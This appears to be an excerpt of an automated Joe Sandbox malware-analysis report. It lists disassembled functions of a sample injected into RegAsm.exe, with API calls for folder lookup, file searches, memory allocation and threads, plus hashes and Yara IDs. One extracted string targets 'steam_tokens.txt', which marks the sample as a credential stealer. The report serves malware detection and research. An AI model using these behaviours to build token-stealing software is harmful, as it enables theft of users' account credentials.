                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                            • String ID: Vj@
                                                                                                                                                                                                            • API String ID: 544645111-2126399917
                                                                                                                                                                                                            • Opcode ID: bdfb7b917f3f703cfce727fbfd478be771f3d57ba6f1b7257c266257cef2b284
                                                                                                                                                                                                            • Instruction ID: 7c3753fe3928ac4ad57f92e0e7a78c02158cd505352ef7d4175bafa3efee33a4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bdfb7b917f3f703cfce727fbfd478be771f3d57ba6f1b7257c266257cef2b284
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 461125B16081069FD724DF4CD8907A6F3DAFB08300F11053BE98ED3680D279AC608B9A
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00411550 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,viB,00000000,00000000,?,00000000), ref: 00411588
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FolderPathlstrcpy
                                                                                                                                                                                                            • String ID: viB
                                                                                                                                                                                                            • API String ID: 1699248803-2211462562
                                                                                                                                                                                                            • Opcode ID: bfb6cba422f2ff1d5c67e15a9fe0da02cb9e06b20b6a88eb5ef953e6056a89c2
                                                                                                                                                                                                            • Instruction ID: 5afadf1fd3eaff9e1276ef343573c08e2d07cc923f465657cf2b332829cf085f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfb6cba422f2ff1d5c67e15a9fe0da02cb9e06b20b6a88eb5ef953e6056a89c2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AF08231A1015CBBDB10DB58DC51B9DB7FDDB44715F1081A6AD08A32C0D6706F068B94
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004114F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421A38,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 00411517
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                            • API String ID: 3188754299-3946550938
                                                                                                                                                                                                            • Opcode ID: 794cec13b8e637fade0fbee6091e71c0899d30f898c45fdb59677c0dfaa8a23a
                                                                                                                                                                                                            • Instruction ID: aea6c2c974d0dba5a4bd0aa356ab37a3ba2cbbb5d35599633b307cf16285cf02
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 794cec13b8e637fade0fbee6091e71c0899d30f898c45fdb59677c0dfaa8a23a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3F08272905658EBC710EF58D801B99B768EB05B30F50436AFC26A37D0C73C5A4186C4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00415430 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004271CB,?,00000000,004224A0,000000FF,?,00418114,?), ref: 00415497
                                                                                                                                                                                                              • Part of subcall function 004152B0: Sleep.KERNEL32(000003E8,00422461, cA,?,?,?,00000001), ref: 00415375
                                                                                                                                                                                                              • Part of subcall function 004152B0: CreateThread.KERNEL32(00000000,00000000,00413CE0,?,00000000,00000000), ref: 00415396
                                                                                                                                                                                                              • Part of subcall function 004152B0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004153A2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Soft\Steam\steam_tokens.txt, xrefs: 004154AF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
                                                                                                                                                                                                            • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                            • API String ID: 2356188485-3507145866
                                                                                                                                                                                                            • Opcode ID: 5745eab56e8136d5842bd23a53a651746656d3ee5c95db5c6ae34382c3658804
                                                                                                                                                                                                            • Instruction ID: 8a0f021b4d602071274db16410327e8a0de62f2475aab370c1f463b76625da35
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5745eab56e8136d5842bd23a53a651746656d3ee5c95db5c6ae34382c3658804
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB214F71804248EACB11EBA5D946BDDBB78AF18318F50417EE816736C2DB7C160CCAB6
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004176E0 Relevance: 2.6, APIs: 2, Instructions: 141stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,viB,00000000,00000000,?,00000000), ref: 00411588
                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00417737
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00CC1750), ref: 00417756
                                                                                                                                                                                                              • Part of subcall function 00417420: wsprintfA.USER32 ref: 00417458
                                                                                                                                                                                                              • Part of subcall function 00417420: FindFirstFileA.KERNEL32(?,?), ref: 0041746F
                                                                                                                                                                                                              • Part of subcall function 00417420: StrCmpCA.SHLWAPI(?,0042751C), ref: 004174AC
                                                                                                                                                                                                              • Part of subcall function 00417420: StrCmpCA.SHLWAPI(?,00427520), ref: 004174C6
                                                                                                                                                                                                              • Part of subcall function 00417420: wsprintfA.USER32 ref: 004174EB
                                                                                                                                                                                                              • Part of subcall function 00417420: StrCmpCA.SHLWAPI(?,00427196), ref: 004174FA
                                                                                                                                                                                                              • Part of subcall function 00417420: wsprintfA.USER32 ref: 00417517
                                                                                                                                                                                                              • Part of subcall function 00417420: PathMatchSpecA.SHLWAPI(?,?), ref: 00417547
                                                                                                                                                                                                              • Part of subcall function 00417420: lstrcat.KERNEL32(?,00CBF420), ref: 00417573
                                                                                                                                                                                                              • Part of subcall function 00417420: lstrcat.KERNEL32(?,00427538), ref: 00417585
                                                                                                                                                                                                              • Part of subcall function 00417420: lstrcat.KERNEL32(?,?), ref: 00417593
                                                                                                                                                                                                              • Part of subcall function 00417420: lstrcat.KERNEL32(?,0042753C), ref: 004175A5
                                                                                                                                                                                                              • Part of subcall function 00417420: lstrcat.KERNEL32(?,?), ref: 004175B9
                                                                                                                                                                                                              • Part of subcall function 00417420: wsprintfA.USER32 ref: 00417536
                                                                                                                                                                                                              • Part of subcall function 00417420: FindNextFileA.KERNEL32(000000FF,?), ref: 00417687
                                                                                                                                                                                                              • Part of subcall function 00417420: FindClose.KERNEL32(000000FF), ref: 00417699
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 153043497-0
                                                                                                                                                                                                            • Opcode ID: 980c6c65570b6984db1cb0369e472beaa0b0a8abf634df122684650a0c25765b
                                                                                                                                                                                                            • Instruction ID: 5b0c1268bca937b6c0622831ffd3659b7be3d63a11705933043f84870864bdba
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 980c6c65570b6984db1cb0369e472beaa0b0a8abf634df122684650a0c25765b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A51C7B5900208EBC714EBA4DC42EFE7B7AAB48704F00436EF80567296DB7857548BE5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00406550 Relevance: 2.6, APIs: 2, Instructions: 71memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406A0E,00000000), ref: 004065AF
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406A0E,00000000), ref: 004065E3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                            • Opcode ID: 05b4c1d6b8d8c16b753068be011d095b66a4696be7e78814b8d4b5191835b582
                                                                                                                                                                                                            • Instruction ID: 307c63db32dd85507ef60eb9078a071d01a6145ff22a74080f45120ef5a07aab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05b4c1d6b8d8c16b753068be011d095b66a4696be7e78814b8d4b5191835b582
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B021E4713407006BD334CF79DC81BABB7EAEB84714F14492EEA1EDA3D0D679E8408658
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004069C0 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d9fc23f20392344533ef2d983e31f0e7033ca9f6a2f3c0fdbc76c7e886b2572f
                                                                                                                                                                                                            • Instruction ID: 0c77b343086b070939783159600971ab4d0f9c2096a8bdcc4f1773babb16f5ec
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9fc23f20392344533ef2d983e31f0e7033ca9f6a2f3c0fdbc76c7e886b2572f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55418EB1A002199FDB14DF59D940AAFB7B8AF44354F01807AE80AF7391E638ED60CB95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004115B0 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00413B11,?,00000001,00000004,?,00413B10,00000000,00000000), ref: 004115CC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocLocal
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3494564517-0
                                                                                                                                                                                                            • Opcode ID: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                            • Instruction ID: e2f45693e22dee64b2117a842d0cd14d1d044b0645625ff153940cded4a5b51e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAF05C36B026113B83120B9D88805A7F79FEFC5E60714012BDB4ACB324C931DC4042E0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%